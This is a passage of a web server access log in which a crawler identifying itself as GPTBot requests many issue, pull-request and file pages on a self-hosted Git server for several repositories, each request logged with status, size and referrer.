10226] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:25:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/dist/PostgresPatrol.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" +[17/Feb/2026:19:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/dist/PostgresPatrol.exe" +[17/Feb/2026:19:25:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:25:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?state=open&type=all" [Client 74.7.227.38] [Length 9951] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" +[17/Feb/2026:19:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" +[17/Feb/2026:19:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 11078] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:19:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec?display=rendered" [Client 74.7.227.38] [Length 11131] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:19:25:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec?display=rendered" [Client 74.7.227.38] [Length 11131] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:19:25:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:19:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:19:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec?display=rendered" [Client 74.7.227.38] [Length 11127] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:19:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:19:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:19:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:25:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:25:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:19:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=oldest&state=all&type=all" +[17/Feb/2026:19:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr 